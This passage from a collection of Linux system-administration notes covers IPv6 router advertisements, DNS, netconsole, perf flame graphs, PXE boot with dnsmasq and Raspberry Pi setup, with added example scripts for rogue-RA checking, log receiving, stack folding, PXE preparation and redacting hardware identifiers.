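    src_ll = struct.pack(">BB6s", OPT_SOURCE_LLADDR, 1, bytes.fromhex("020042424242"))
    prefix = struct.pack(">BBBBIII16s", OPT_PREFIX_INFO, 4, 64, 0xC0, 86400, 14400, 0,
                         ipaddress.IPv6Address("2001:db8::").packed)
    mtu = struct.pack(">BBHI", OPT_MTU, 1, 0, 1500)
    rdnss = struct.pack(">BBHI16s", OPT_RDNSS, 3, 0, 3600,
                        ipaddress.IPv6Address("2001:db8::53").packed)
    return hdr + src_ll + prefix + mtu + rdnss


if __name__ == "__main__":
    advert = parse_router_advertisement(build_sample_ra(), "fe80::4242:42ff:fe42:4242")
    print(advert)
    print(check_against_expectations(advert, "02:00:42:42:42:42", ["2001:db8::53"]))
```

The checksum is not verified here because it covers an IPv6 pseudo-header that is not part of the payload; when reading from a raw socket the kernel has already validated it. Running the check in a loop on a link is a simple rogue-RA detector: an advertisement with an unexpected source MAC or resolver is what a mis-plugged router or a malicious neighbour looks like.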

If your gateway answers ping requests,
you can run this command to get its IPv6 address::

    ping6 -c1 ff02::2%eth0

The result would look like::

    PING ff02::2%eth0(ff02::2) 56 data bytes
    64 bytes from fe80::4242:42ff:fe42:4242: icmp_seq=1 ttl=64 time=0.420 ms

In such a case, you may configure your default route with this link-local address
(in ``fe80::/64``)::

    ip -6 route add default via fe80::4242:42ff:fe42:4242 dev eth0


DNS configuration
-----------------
In automatic configurations, the IP addresses of the local DNS servers and the
search domains are found in DHCP options and RA options. If you use software
like NetworkManager, resolvconf or wicd, this information is directly written
in ``/etc/resolv.conf``.

In a manual configuration, edit this file with lines like these::

    # resolver1.opendns.com and resolver2.opendns.com
    nameserver 208.67.222.222
    nameserver 208.67.220.220
    domain example.com
    search example.com


Systemd network configuration
-----------------------------
On a server which provides an ``ens42`` wired connection with a static IP
configuration, it is possible to use systemd-networkd with the following
configuration in ``/etc/systemd/network/wired.network``::

    [Match]
    Name=ens42

    [Network]
    Address=192.168.0.42/24
    Gateway=192.168.0.1


Broadcast ping
--------------
To discover pingable hosts on your network, send an Echo Request (ping) to
every host.
In IPv4 this broadcasts an ICMP type 8 message::

    ping -b 255.255.255.255 -I eth0

Note that Linux hosts ignore broadcast pings by default
(``net.ipv4.icmp_echo_ignore_broadcasts`` is 1), so the result is not exhaustive.

In IPv6 this multicasts an ICMPv6 type 128 message to all nodes::

    ping6 ff02::1%eth0

After such a command, you may list the link-layer addresses of your neighbors by
issuing::

    ip neigh show


Link-layer ping
---------------
When the network doesn't give your host an IP address, you need to find an unused
one. In IPv4 you can test whether an IP address is free or used by sending ARP
requests (which doesn't require an IPv4 address to be configured, unlike
``ping``)::

    arping 192.168.0.42 -I eth0

In IPv6, ARP requests are replaced with Neighbor Solicitation (ICMPv6 type 135)
messages::

    ndisc6 2001:db8::42 eth0
-------------------------------------------------------------------------------- /sysadmin/netconsole.rst: --------------------------------------------------------------------------------
Kernel Network Console (netconsole module)
==========================================

To debug hosts when a display is not available, or in other circumstances, it's
possible to set up a network console so that kernel messages go through the
network to a destination host which can display these messages. Let's say the
source host (which sends messages) has an Ethernet interface ``eth0`` which is
linked to the destination host (which receives messages).
The addresses of the interfaces are as follows:

+-------------+-----------------------+-------------------------------+------+
| Host        | MAC address           | Link-local IPv6 address       | Port |
+=============+=======================+===============================+======+
| Source      | ``00:00:00:00:00:01`` | ``fe80::0200:00ff:fe00:0001`` | 6665 |
+-------------+-----------------------+-------------------------------+------+
| Destination | ``00:00:00:00:00:02`` | ``fe80::0200:00ff:fe00:0002`` | 6666 |
+-------------+-----------------------+-------------------------------+------+

The configuration of the netconsole module is documented like this::

    netconsole=[src-port]@[src-ip]/[<dev>],[tgt-port]@<tgt-ip>/[tgt-macaddr]

where:

* ``src-port``: source port of the UDP packets (defaults to 6665)
* ``src-ip``: source IP to use (interface address)
* ``dev``: network interface (eth0)
* ``tgt-port``: port of the logging agent (6666)
* ``tgt-ip``: IP address of the logging agent
* ``tgt-macaddr``: Ethernet MAC address of the logging agent (broadcast)

Hence, in the previous scenario, the configuration line is::

    netconsole=6665@fe80::0200:00ff:fe00:0001/eth0,6666@fe80::0200:00ff:fe00:0002/00:00:00:00:00:02

This line can be set as-is either on boot::

    linux loglevel=5 netconsole=...

or when loading the module::

    modprobe netconsole netconsole=...

Once the source host is configured, you would normally set up something which
is listening for incoming messages on the destination host.

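
Here is such a listener, added as an example (it is not part of the original page, which uses ``socat`` below): a Python UDP receiver for the destination host that only keeps datagrams coming from the source address and port of the table above, since netconsole itself offers no authentication. The address and port constants are the ones of this document; the sample datagram is constructed.

```python
"""netconsole receiver, added as an example (not part of the original page).

Binds the destination port, drops datagrams that do not come from the
configured source host and port, and prints the kernel log lines it gets.
"""
import ipaddress
import socket
from typing import List, Optional, Tuple

# Values from the address table of this document
SRC_IP = "fe80::0200:00ff:fe00:0001"
SRC_PORT = 6665
DST_PORT = 6666


def is_expected_source(addr: Tuple, expected_ip: str = SRC_IP,
                       expected_port: int = SRC_PORT) -> bool:
    """Compare the (host, port, ...) tuple of recvfrom() with the expected peer.

    The host is normalised so that the written form "fe80::0200:00ff:fe00:0001"
    and the kernel's "fe80::200:ff:fe00:1" compare equal; a "%scope" suffix,
    if present, is ignored.
    """
    host, port = addr[0].split("%", 1)[0], addr[1]
    try:
        return (ipaddress.ip_address(host) == ipaddress.ip_address(expected_ip)
                and port == expected_port)
    except ValueError:
        return False


def handle_datagram(data: bytes, addr: Tuple) -> Optional[List[str]]:
    """Return the log lines of an accepted datagram, or None when the sender is
    not the configured source (the datagram is dropped, as the firewall would)."""
    if not is_expected_source(addr):
        return None
    text = data.decode("utf-8", errors="replace")
    return [line for line in text.splitlines() if line]


def serve(port: int = DST_PORT, max_datagrams: Optional[int] = None) -> int:
    """Print accepted kernel messages; return how many datagrams were accepted."""
    sock = socket.socket(socket.AF_INET6, socket.SOCK_DGRAM)
    sock.bind(("::", port))
    accepted = seen = 0
    while max_datagrams is None or seen < max_datagrams:
        data, addr = sock.recvfrom(4096)
        seen += 1
        lines = handle_datagram(data, addr)
        if lines is None:
            print("dropped datagram from %s port %d" % (addr[0], addr[1]))
            continue
        accepted += 1
        for line in lines:
            print("%s: %s" % (addr[0], line))
    return accepted


# Constructed sample: what the SysRq help trigger of this document produces
SAMPLE_DATAGRAM = (b"[  123.456789] sysrq: HELP : loglevel(0-9) reboot(b)\n",
                   ("fe80::200:ff:fe00:1", 6665, 0, 2))


def demo() -> Optional[List[str]]:
    return handle_datagram(*SAMPLE_DATAGRAM)


if __name__ == "__main__":
    serve()
```

Each printk line arrives in its own datagram, so there is nothing to reassemble; the source check is the only thing that separates the real kernel from anything else able to send UDP to that port, which is why it duplicates the firewall filtering rather than replacing it.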

For example, with ``socat``::

    socat UDP6-RECV:6666 -

To test the communication between the 2 hosts, you may send a raw UDP packet::

    echo test | socat - 'UDP6:[fe80::0200:00ff:fe00:0002]:6666,sourceport=6665'

and if this worked, trigger a kernel message on the source host::

    echo h > /proc/sysrq-trigger


Dynamic configuration
---------------------

To dynamically change netconsole's settings, you need to mount the kernel
configfs filesystem::

    modprobe configfs
    mount none -t configfs /sys/kernel/config
    # /sys/kernel/config/netconsole exists if the netconsole module is loaded
    mkdir /sys/kernel/config/netconsole/target

Now, ``/sys/kernel/config/netconsole/target`` contains some files.
To configure this new netconsole target, you need to write the values to each
file before writing 1 to ``enabled``::

    cd /sys/kernel/config/netconsole/target
    echo eth0 > dev_name
    echo fe80::0200:00ff:fe00:0001 > local_ip
    echo 6665 > local_port
    echo fe80::0200:00ff:fe00:0002 > remote_ip
    echo 00:00:00:00:00:02 > remote_mac
    echo 6666 > remote_port
    echo 1 > enabled


Firewall configuration
----------------------

Here are the iptables rules to add to the firewall to accept the communication.
Keep in mind that netconsole sends the kernel log in clear text over UDP, without
authentication: the filtering by interface, MAC and source address suggested below
is the only thing limiting who can inject lines into the logs of the destination
host, and the messages themselves should stay on a trusted link.

Source host::

    iptables -A OUTPUT -p udp -m udp --sport 6665 --dport 6666 -j ACCEPT
    ip6tables -A OUTPUT -p udp -m udp --sport 6665 --dport 6666 -j ACCEPT

Destination host::

    # You would add some specific filtering:
    # * by interface: -i eth0
    # * by MAC address: -m mac --mac-source 00:00:00:00:00:01
    # * by source IP address: -s fe80::0200:00ff:fe00:0001
    iptables -A INPUT -p udp -m udp --sport 6665 --dport 6666 -j ACCEPT
    ip6tables -A INPUT -p udp -m udp --sport 6665 --dport 6666 -j ACCEPT


Documentation links
-------------------

* https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/tree/Documentation/networking/netconsole.txt
  Linux Documentation
* https://wiki.archlinux.org/index.php/Netconsole
  ArchLinux wiki
* https://wiki.ubuntu.com/Kernel/Netconsole
  Ubuntu wiki
-------------------------------------------------------------------------------- /sysadmin/perf-linux.rst: --------------------------------------------------------------------------------
Using perf on Linux
===================

Introduction
------------

``perf`` is a tool to analyze the performance of applications and of the kernel on Linux-based systems.
It relies on the ``perf_event_open`` syscall (http://man7.org/linux/man-pages/man2/perf_event_open.2.html) to access the performance monitoring facilities provided by the kernel.
These facilities consist of:

* tracepoints (probes) in the kernel, the C library (glibc), some interpreters, etc.
12 | * processor counters from the PMU (Performance Instrumentation Unit), like Intel PMC (Performance Monitoring Counter), replaced by Intel PCM (Processor Counter Monitor), or PIC (Performance Instrumentation Counter) 13 | * hardware-assisted tracing, like Intel PT (Processor Tracing) 14 | 15 | The access of the performance events system by unprivileged users is configured through sysctl ``kernel.perf_event_paranoid`` (file ``/proc/sys/kernel/perf_event_paranoid``). 16 | The value of this setting is documented on https://www.kernel.org/doc/Documentation/sysctl/kernel.txt: 17 | 18 | * ``-1``: Allow use of (almost) all events by all users. 19 | Ignore ``mlock`` limit after ``perf_event_mlock_kb`` without ``CAP_IPC_LOCK`` 20 | * ``>= 0``: Disallow ``ftrace`` function tracepoint by users without ``CAP_SYS_ADMIN``. 21 | Disallow raw tracepoint access by users without ``CAP_SYS_ADMIN`` 22 | * ``>= 1``: Disallow CPU event access by users without ``CAP_SYS_ADMIN`` 23 | * ``>= 2``: Disallow kernel profiling by users without ``CAP_SYS_ADMIN`` 24 | 25 | 26 | Usage 27 | ----- 28 | 29 | The tool named ``perf`` works with subcommands (``stat``, ``record``, ``report``...). 30 | 31 | .. code-block:: sh 32 | 33 | # Enumerate all symbolic event types 34 | perf list 35 | 36 | # Look for events related to KVM hypervisor 37 | perf list 'kvm:*' 38 | 39 | In order to collect several statistics about a command: 40 | 41 | .. code-block:: sh 42 | 43 | perf stat $COMMAND 44 | 45 | Example with ``uname``: 46 | 47 | .. 
Example with ``uname``:

.. code-block:: text

    # perf stat uname
    Linux

     Performance counter stats for 'uname':

                  0.50 msec task-clock                #    0.551 CPUs utilized
                     0      context-switches          #    0.000 K/sec
                     0      cpu-migrations            #    0.000 K/sec
                    67      page-faults               #    0.133 M/sec
             1,837,945      cycles                    #    3.656 GHz
             1,266,497      instructions              #    0.69  insn per cycle
               284,608      branches                  #  566.071 M/sec
                 8,956      branch-misses             #    3.15% of all branches

           0.000911814 seconds time elapsed

           0.001001000 seconds user
           0.000000000 seconds sys

In order to record a trace of a command:

.. code-block:: sh

    perf record $COMMAND

    # --branch-any: enable taken branch stack sampling
    # --call-graph=dwarf: enable call-graph (stack chain/backtrace) recording with DWARF information
    perf record --branch-any --call-graph=dwarf $COMMAND

    # Record a running process during 30 seconds
    # -a = --all-cpus: system-wide collection from all CPUs
    # -g (like --call-graph=fp): enable call-graph (stack chain/backtrace) recording
    # -p = --pid: record events on existing process ID (comma separated list)
    timeout 30s perf record -a -g -p $(pidof $MYPROCESS)

This creates a file named ``perf.data``, which can be analyzed with other subcommands.
A system-wide (``-a``) recording contains addresses, symbols and command names from every process on the host, so treat the file as sensitive.

.. code-block:: sh
    # Show perf.data in an ncurses browser (TUI) if possible
    perf report

    # Dump the raw trace in ASCII
    perf report -D
    perf report --dump-raw-trace

    # Display the trace output
    perf script

    # Show perf.data as:
    # * a text report
    # * with a column for sample count
    # * with call stacks
    # * with data coalesced and percentages
    perf report --stdio -n -g folded

    # Print the file header (--header) and selected fields for each sample;
    # the cpu field is only meaningful for a system-wide (-a) record
    perf script --header -F comm,pid,tid,cpu,time,event,ip,sym,dso

The trace can also be analyzed with a GUI such as https://github.com/KDAB/hotspot.

When Intel PT (Processor Trace) is available on the CPU, the following commands can be used to trace a program (from https://lkml.org/lkml/2019/11/27/160):

.. code-block:: sh

    perf record -e '{intel_pt//,cpu/mem_inst_retired.all_loads,aux-sample-size=8192/pp}:u' $COMMAND
    perf script -F +brstackinsn --xed --itrace=i1usl100

More recent versions of ``perf`` introduced an equivalent of ``strace`` that does not use the ``ptrace`` syscall (the traced program is not stopped at each syscall and no tracer is attached to it):

.. code-block:: sh

    perf trace --call-graph=dwarf $COMMAND

    # Or, with perf record:
    perf record -e 'raw_syscalls:*' $COMMAND

    # Trace with "augmented syscalls" (in order to see string parameters, for example)
    perf trace -e /usr/lib/perf/examples/bpf/augmented_raw_syscalls.c $COMMAND


Flame Graphs
------------

Using https://github.com/brendangregg/FlameGraph, it is very simple to produce a flame graph out of a trace.
This is useful, for example, to find which functions of a program take most of the time and need to be optimized.
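What ``stackcollapse-perf.pl`` does with the ``perf script`` output above, as an added example written here (it is not the FlameGraph project's code): an awk-based folder that turns each sample block (innermost frame first) into one ``comm;root;...;leaf count`` line, which is exactly the input ``flamegraph.pl`` expects. The ``perf script`` excerpt it runs on is constructed, not a real capture.

```shell
#!/bin/sh
# Added example: fold "perf script" call stacks into the FlameGraph
# "comm;frame;frame;... count" format, like stackcollapse-perf.pl does.
# Input format (one sample per block, frames listed innermost first):
#   comm  pid [cpu] time:  period event:
#       <hex address> <symbol> (<dso>)
#       ...
#   <blank line>
fold_perf_script() {
    awk '
    function flush() {
        if (comm != "") {
            key = (stack == "") ? comm : comm ";" stack
            counts[key]++
        }
        comm = ""; stack = ""
    }
    # sample header: starts in column 0 with the command name
    /^[^ \t]/ { flush(); comm = $1; next }
    # frame line: indented "<hex address> <symbol> (<dso>)"; prepend the
    # symbol so the folded stack reads root first, leaf last
    /^[ \t]+[0-9a-fA-F]+[ \t]/ {
        stack = (stack == "") ? $2 : $2 ";" stack
        next
    }
    /^[ \t]*$/ { flush() }
    END { flush(); for (k in counts) print k, counts[k] }
    ' | sort
}

# Constructed "perf script" excerpt (not a real capture). perf indents
# frames with a tab; leading spaces are handled the same way.
SAMPLE_PERF_SCRIPT='sleep  1234 [000] 12345.678901:    1 cpu-clock:
        ffffffff8100a0b0 native_safe_halt ([kernel.kallsyms])
        ffffffff8101e4c0 default_idle ([kernel.kallsyms])

sleep  1234 [000] 12345.688901:    1 cpu-clock:
        ffffffff8100a0b0 native_safe_halt ([kernel.kallsyms])
        ffffffff8101e4c0 default_idle ([kernel.kallsyms])

myapp  4321 [001] 12345.698901:    1 cpu-clock:
        000055d0c1a2b3c4 hash_block (/usr/bin/myapp)
        000055d0c1a2b000 main (/usr/bin/myapp)
        00007f3c1a0291e2 __libc_start_main (/usr/lib/libc.so.6)
'

# Fold the constructed sample; the output can be piped into flamegraph.pl.
fold_sample() {
    printf '%s' "$SAMPLE_PERF_SCRIPT" | fold_perf_script
}

fold_sample
```

Two identical ``sleep`` stacks collapse into one line with count 2, which is the whole point of the folding step: the flame graph's bar widths are these counts, and ``grep my_application < out.folded`` in the commands below simply filters on the leading ``comm`` field.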
.. code-block:: sh

    # Record stack samples at 99 Hertz during 60 seconds
    # (both userspace and kernel-space stacks, all processes)
    perf record -F 99 -a -g -- sleep 60

    # Fold the stacks into a text file
    perf script | ./stackcollapse-perf.pl --all > out.folded

    # Filter on names of processes, functions... and create a flame graph
    grep my_application < out.folded | ./flamegraph.pl --color=java > graph.svg

Another project enables producing flame graphs for Rust projects: https://github.com/ferrous-systems/flamegraph


Documentation
-------------

* https://perf.wiki.kernel.org/index.php/Tutorial
  perf Wiki - Tutorial
* http://www.brendangregg.com/perf.html
  Linux perf Examples, documentation, links, and more!
* http://www.brendangregg.com/flamegraphs.html
  Flame Graphs
* https://github.com/brendangregg/perf-tools
  perf-tools GitHub project
* https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/tree/tools/perf/Documentation/perf-record.txt
  perf-record man page
* https://alexandrnikitin.github.io/blog/transparent-hugepages-measuring-the-performance-impact/
  Transparent Hugepages: measuring the performance impact
* https://twitter.com/b0rk/status/945900285460926464
  perf cheat sheet by Julia Evans
--------------------------------------------------------------------------------
/sysadmin/pxe-boot-server.rst:
--------------------------------------------------------------------------------
Configure a server to handle network boot (PXE)
===============================================

*PXE* (Preboot Execution Environment) is a way to boot a computer which can't boot
from a physical drive (CD, DVD, USB). The computer gets an IP address from the
network using DHCP and then downloads a boot image from a TFTP (Trivial File
Transfer Protocol) server.
On Linux, Dnsmasq does all the networking part (DHCP and TFTP) and
Syslinux provides the PXE boot loader. The LiveCD of any GNU/Linux distribution
contains configuration files for Syslinux and a compressed file system which can
be used for network boot.

Example
-------

1- Configure the PXE server network (IP address, DNS...) and make it up and
running.

2- Uncompress or mount an ISO image of an Ubuntu LiveCD to ``/tmp/iso``.
This may work too with other distributions, but this example has only been
tested with Ubuntu.

3- Prepare a TFTP directory:

.. code-block:: sh

    mkdir -p /srv/tftpboot
    cp -a /tmp/iso/isolinux/* /srv/tftpboot/
    mkdir /srv/tftpboot/pxelinux.cfg
    mv /srv/tftpboot/isolinux.cfg /srv/tftpboot/pxelinux.cfg/default

    cp -r /tmp/iso/casper /srv/tftpboot

    # This requires Syslinux to be installed
    cp /usr/lib/syslinux/pxelinux.0 /srv/tftpboot

4- Configure Dnsmasq to be both a DHCP server and a TFTP one. To do so, edit
``/etc/dnsmasq.conf``::

    # Uncomment the following line if you want to restrict to one interface
    #interface=eth0
    dhcp-range=192.168.0.50,192.168.0.150,12h
    dhcp-boot=pxelinux.0
    enable-tftp
    tftp-root=/srv/tftpboot

Restricting Dnsmasq to one interface is not optional on a multi-homed host: a
DHCP server that answers on every attached network hands out addresses and boot
files to any client there, and everything under ``tftp-root`` is served without
authentication.

5- (Re)Start the Dnsmasq service and enjoy your PXE server!


Debian network installation
---------------------------

Debian provides files on its FTP mirrors which can be used to set up a PXE
server to boot Debian netinstall.

* 32-bit version:
  ftp://ftp.debian.org/debian/dists/stable/main/installer-i386/current/images/netboot/debian-installer/i386/
* 64-bit version:
  ftp://ftp.debian.org/debian/dists/stable/main/installer-amd64/current/images/netboot/debian-installer/amd64/
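Steps 3 and 4 of the LiveCD procedure as one script, added here as an example (it is not part of the original page): it builds the TFTP root from an unpacked ISO, writes a Dnsmasq fragment bound to a single interface, and checks that the files a PXE client will request are present, which also applies to the Debian netboot layout above. All paths and the interface name are parameters; the run at the bottom uses a constructed fake ISO tree in a temporary directory rather than a real LiveCD.

```shell
#!/bin/sh
# Added example: build a PXE TFTP root and a matching dnsmasq fragment.
set -e

# prepare_tftp_root ISO_DIR TFTP_ROOT PXELINUX_0
# Replays step 3: isolinux files become pxelinux files, the casper tree
# (kernel, initrd, squashfs) is copied and pxelinux.0 comes from syslinux.
prepare_tftp_root() {
    iso="$1"; root="$2"; pxelinux="$3"
    mkdir -p "$root/pxelinux.cfg"
    cp -a "$iso"/isolinux/. "$root/"
    mv "$root/isolinux.cfg" "$root/pxelinux.cfg/default"
    [ -d "$iso/casper" ] && cp -r "$iso/casper" "$root/"
    cp "$pxelinux" "$root/pxelinux.0"
}

# dns_masq_pxe_conf IFACE RANGE_START RANGE_END TFTP_ROOT
# Writes the step-4 configuration to stdout, bound to one interface:
# without interface= and bind-interfaces, dnsmasq answers DHCP on every
# network the host is attached to and becomes a rogue DHCP server there.
dnsmasq_pxe_conf() {
    cat <<EOF
interface=$1
bind-interfaces
dhcp-range=$2,$3,12h
dhcp-boot=pxelinux.0
enable-tftp
tftp-root=$4
# Optional: only serve files owned by the dnsmasq user (requires
# chown -R of the TFTP root to that user, otherwise nothing is served):
#tftp-secure
EOF
}

# check_tftp_root TFTP_ROOT: returns 0 if the files a PXE client requests exist.
check_tftp_root() {
    root="$1"
    for f in pxelinux.0 pxelinux.cfg/default; do
        [ -f "$root/$f" ] || { echo "missing $root/$f" >&2; return 1; }
    done
    # syslinux >= 5 also needs ldlinux.c32 next to pxelinux.0
    [ -f "$root/ldlinux.c32" ] || echo "note: no ldlinux.c32 (needed with syslinux >= 5)" >&2
    return 0
}

# Self-contained run against a constructed fake ISO tree; prints the temp dir.
demo_pxe() {
    tmp=$(mktemp -d)
    mkdir -p "$tmp/iso/isolinux" "$tmp/iso/casper" "$tmp/syslinux"
    printf 'DEFAULT vesamenu.c32\n' > "$tmp/iso/isolinux/isolinux.cfg"
    : > "$tmp/iso/casper/filesystem.squashfs"
    : > "$tmp/syslinux/pxelinux.0"
    prepare_tftp_root "$tmp/iso" "$tmp/tftpboot" "$tmp/syslinux/pxelinux.0"
    dnsmasq_pxe_conf eth0 192.168.0.50 192.168.0.150 "$tmp/tftpboot" > "$tmp/dnsmasq-pxe.conf"
    check_tftp_root "$tmp/tftpboot"
    echo "$tmp"
}

dir=$(demo_pxe)
cat "$dir/dnsmasq-pxe.conf"
rm -rf "$dir"
```

On a real server, the generated fragment goes to ``/etc/dnsmasq.d/pxe.conf`` (or is merged into ``/etc/dnsmasq.conf``), and ``check_tftp_root /srv/tftpboot`` is the thing to run after step 3 before restarting the service.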
On this FTP, only ``initrd.gz``, ``linux`` and ``pxelinux.0`` are really useful.
``pxelinux.cfg/default`` can be rewritten in a much simpler version::

    DEFAULT linux
    LABEL linux
        kernel linux
        append vga=normal initrd=initrd.gz --
    TIMEOUT 0
--------------------------------------------------------------------------------
/sysadmin/raspberrypi.rst:
--------------------------------------------------------------------------------
Configuration tweaks on a Raspberry Pi
======================================

Raspbian installation
---------------------

Download the Raspbian image from http://www.raspberrypi.org/downloads.

Each time the SD card is mounted and files modified, ``/etc/fake-hwtime`` or
``/etc/fake-hwclock.data`` needs to be updated with the current date and time in
``YYYY-MM-DD HH:MM:SS`` format. Otherwise the system may experience some
timing-related issues (and fail to mount the root filesystem).
This can be done with::

    date '+%Y-%m-%d %H:%M:%S' > /etc/fake-hwclock.data

You may run the system on the SD card in QEMU if you don't have an HDMI screen.
http://xecdesign.com/qemu-emulating-raspberry-pi-the-easy-way/ describes how to
achieve that, by downloading a special kernel for qemu-arm and running:

.. code-block:: sh

    qemu-system-arm -kernel kernel-qemu -cpu arm1176 -m 256 -M versatilepb \
        -no-reboot -serial stdio -append "root=/dev/sda2 panic=1" -hda /dev/sdb

This kernel has been compiled with the instructions written on
http://xecdesign.com/compiling-a-kernel/.
It is configured to build a kernel
for an ARM11 (ARMv6) versatile board, which requires a patch to be applied:
http://xecdesign.com/downloads/linux-qemu/linux-arm.patch


Post-install configuration
--------------------------

Like on all Debian systems, some files need updating after the initial setup:

* ``/etc/mailname`` (with the host name to be used in outgoing mail)
* ``/etc/sudoers`` (remove ``pi ALL=(ALL) NOPASSWD: ALL``, which lets the default account become root without any password)
* ``/etc/ntp.conf`` (remove ``restrict ::1`` if the IPv6 module is not loaded)
* Reconfigure the keyboard: ``keyboard-configuration``
* Change the timezone: ``tzselect`` (``TZ='Europe/Paris'; export TZ``)

Moreover, ``/etc/sysctl.conf`` contains Raspberry Pi-specific configuration::

    # rpi tweaks
    vm.swappiness=1
    vm.min_free_kbytes = 8192


Networking
----------

``/etc/network/interfaces`` with a dynamic configuration::

    auto lo
    # Add contents:
    allow-hotplug eth0

    iface lo inet loopback
    iface eth0 inet dhcp

    allow-hotplug wlan0
    iface wlan0 inet manual
    wpa-roam /etc/wpa_supplicant/wpa_supplicant.conf
    iface default inet dhcp

Static configuration may be used with the following lines::

    iface eth0 inet static
        address 192.0.2.2
        netmask 255.255.255.0
        gateway 192.0.2.1


Enable IPv6
-----------

To enable IPv6, use the following commands:

.. code-block:: sh

    modprobe ipv6
    sysctl -w net.ipv6.conf.default.use_tempaddr=2
    sysctl -w net.ipv6.conf.all.use_tempaddr=2

``use_tempaddr=2`` enables and prefers RFC 4941 temporary (privacy) addresses, so the
MAC-derived interface identifier is not exposed by outgoing connections.
To make these changes persistent, add ``ipv6`` to ``/etc/modules`` and
``net.ipv6.conf.default.use_tempaddr = 2`` to ``/etc/sysctl.conf``.


Some useful system information
------------------------------

Here are the outputs of several commands to retrieve system information on a
Raspberry Pi, model B.

* As some people consider a serial number and a MAC address as sensitive
  information, each potentially sensitive hexadecimal byte has been replaced here
  by ``XX``.
* Information about the kernel in use is not relevant here, so these outputs don't
  include the kernel version and kernel pointers have been hidden
  (``sysctl -w kernel.kptr_restrict=2``).
* Address space is randomized (ASLR, ``sysctl -w kernel.randomize_va_space=2``)
  so when dumping ``/proc/*/maps``, random parts of addresses have been
  replaced by ``X``.

::

    $ uname -m
    armv6l

    $ cat /proc/cpuinfo
    processor       : 0
    model name      : ARMv6-compatible processor rev 7 (v6l)
    BogoMIPS        : 2.00
    Features        : swp half thumb fastmult vfp edsp java tls
    CPU implementer : 0x41
    CPU architecture: 7
    CPU variant     : 0x0
    CPU part        : 0xb76
    CPU revision    : 7

    Hardware        : BCM2708
    Revision        : 000f
    Serial          : 00000000XXXXXXXX

    $ cat /proc/cmdline | fmt -80
    dma.dmachans=0x7f35 bcm2708_fb.fbwidth=656
    bcm2708_fb.fbheight=416 bcm2708.boardrev=0xf bcm2708.serial=0xXXXXXXXX
    smsc95xx.macaddr=B8:27:XX:XX:XX:XX sdhci-bcm2708.emmc_clock_freq=100000000
    vc_mem.mem_base=0x1ec00000 vc_mem.mem_size=0x20000000 dwc_otg.lpm_enable=0
    console=ttyAMA0,115200 kgdboc=ttyAMA0,115200 console=tty1 root=/dev/mmcblk0p2
    rootfstype=ext4 elevator=deadline rootwait

    $ cat /proc/modules
    ipv6 278186 32 - Live 0x00000000
    snd_bcm2835 16304 0 - Live 0x00000000
    snd_pcm 77560 1 snd_bcm2835, Live 0x00000000
    snd_seq 53329 0 - Live 0x00000000
    snd_timer 19998 2 snd_pcm,snd_seq, Live 0x00000000
    snd_seq_device 6438 1 snd_seq, Live 0x00000000
    snd 58447 5 snd_bcm2835,snd_pcm,snd_seq,snd_timer,snd_seq_device, Live 0x00000000
    snd_page_alloc 5145 1 snd_pcm, Live 0x00000000
    leds_gpio 2235 0 - Live 0x00000000
    led_class 3562 1 leds_gpio, Live 0x00000000

    $ gcc -E -v - < /dev/null 2>&1 | grep cc1 | fmt -80
    /usr/lib/gcc/arm-linux-gnueabihf/4.6/cc1 -E -quiet -v -imultilib
    . -imultiarch arm-linux-gnueabihf - -march=armv6 -mfloat-abi=hard -mfpu=vfp

    $ cat /proc/self/maps | tail -n2
    beXXX000-beXXX000 rw-p 00000000 00:00 0          [stack]
    ffff0000-ffff1000 r-xp 00000000 00:00 0          [vectors]

    $ lsusb
    Bus 001 Device 002: ID 0424:9512 Standard Microsystems Corp.
    Bus 001 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub
    Bus 001 Device 003: ID 0424:ec00 Standard Microsystems Corp.

    $ readlink /sys/class/net/eth0
    ../../devices/platform/bcm2708_usb/usb1/1-1/1-1.1/1-1.1:1.0/net/eth0
    $ readlink /sys/devices/platform/bcm2708_usb/usb1/1-1/1-1.1/1-1.1:1.0/driver
    ../../../../../../../bus/usb/drivers/smsc95xx
    $ dmesg | grep eth0 | head -n1 | tail -c+16
    smsc95xx 1-1.1:1.0: eth0: register 'smsc95xx' at usb-bcm2708_usb-1.1, smsc95xx USB 2.0 Ethernet, b8:27:XX:XX:XX:XX

    $ lshw | fmt -80 -s
    raspberrypi
        description: Computer
        width: 32 bits
      *-core
           description: Motherboard
           physical id: 0
         *-memory
              description: System memory
              physical id: 0
              size: 438MiB
         *-cpu
              physical id: 1
              bus info: cpu@0
              size: 700MHz
              capacity: 700MHz
              capabilities: cpufreq
         *-network
              description: Ethernet interface
              physical id: 1
              logical name: eth0
              serial: b8:27:XX:XX:XX:XX
              size: 100Mbit/s
              capacity: 100Mbit/s
              capabilities: ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd
              autonegotiation
              configuration: autonegotiation=on broadcast=yes driver=smsc95xx
              driverversion=22-Aug-2005 duplex=full firmware=smsc95xx USB 2.0
              Ethernet ip=192.0.2.42 link=yes multicast=yes port=MII speed=100Mbit/s
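The redaction applied to the outputs above (device-specific serial number and MAC address bytes replaced by ``XX``) as a reusable filter, added here as an example and not part of the original page. It keeps the first three MAC bytes, which only identify the manufacturer, as the outputs above do, and runs on constructed lines rather than on real hardware output.

```shell
#!/bin/sh
# Added example: scrub hardware identifiers from command output before
# sharing it. The vendor part of a MAC (first three bytes, e.g. b8:27:eb
# for the Raspberry Pi Foundation) is kept; the device part becomes XX.
redact_identifiers() {
    sed -E \
        -e 's/([0-9A-Fa-f]{2}:[0-9A-Fa-f]{2}:[0-9A-Fa-f]{2}):[0-9A-Fa-f]{2}:[0-9A-Fa-f]{2}:[0-9A-Fa-f]{2}/\1:XX:XX:XX/g' \
        -e 's/^(Serial[[:space:]]*:[[:space:]]*)([0-9A-Fa-f]{8})[0-9A-Fa-f]{8}[[:space:]]*$/\1\2XXXXXXXX/' \
        -e 's/(\.serial=0x)[0-9A-Fa-f]+/\1XXXXXXXX/g'
}

# Constructed sample lines in the shape of /proc/cpuinfo, /proc/cmdline
# and dmesg output (not taken from a real board).
SAMPLE_SYSINFO='Serial          : 00000000a1b2c3d4
smsc95xx.macaddr=B8:27:EB:12:34:56 bcm2708.serial=0xa1b2c3d4
smsc95xx 1-1.1:1.0: eth0: register smsc95xx at usb-bcm2708_usb-1.1, b8:27:eb:12:34:56
ip=192.0.2.42 link=yes'

# Run the filter over the constructed sample.
redact_sample() {
    printf '%s\n' "$SAMPLE_SYSINFO" | redact_identifiers
}

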